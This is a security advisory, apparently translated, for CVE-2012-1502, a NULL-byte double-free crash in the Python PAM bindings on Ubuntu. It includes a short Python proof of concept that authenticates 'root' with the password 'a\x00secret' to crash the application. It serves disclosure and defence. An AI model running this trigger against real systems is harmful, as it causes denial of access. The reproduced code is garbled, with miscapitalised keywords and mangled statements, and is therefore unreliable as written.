PyPAM password NULL byte processing reference denial of Access Vulnerability

Release date:
Updated on: 2012-03-13

Affected Systems:
Ubuntu Linux 11.x
Ubuntu Linux 10.x
Ubuntu PyPAM
Description:
--------------------------------------------------------------------------------
Bugtraq id: 52370
Cve id: CVE-2012-1502

Python-pam is the interface from Python to the PAM library.

PyPAM has a denial of access vulnerability in verifying the implementation of a password containing NULL bytes. Attackers can exploit this vulnerability to cause application crash.

<* Source: Markus Vervier

Link: http://www.lsexperts.de/advisories/lse-2012-03-01.txt

*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Markus Vervier () provides the following test methods:

#! /Usr/bin/env python
##
# Python-pam 0.4.2 double free PoC
##
#2012 Leading Security Experts GmbH
# Markus Vervier
##
#-*-Coding: UTF-8 -*-

Def verify_password (user, password ):
Import PAM
Def pam_conv (auth, query_list, userData ):
Resp = []
Resp. append (password, 0 ))
Return resp
Res =-3
Service = 'passwd'

Auth = PAM. pam ()
Auth. start (service)
Auth. set_item (PAM. PAM_USER, user)
Auth. set_item (PAM. PAM_CONV, pam_conv)
Try:
Auth. authenticate ()
Auth. acct_mgmt ()
Failed t PAM. error, resp:
Print 'Go away! (% S) '% resp
Res =-1
Except t:
Print 'internal error'
Res =-2
Else:
Print 'Good to go! '
Res = 0

Return res

Print verify_password ("root", "a \ x00secret ")

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Ubuntu
------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://www.ubuntulinux.org/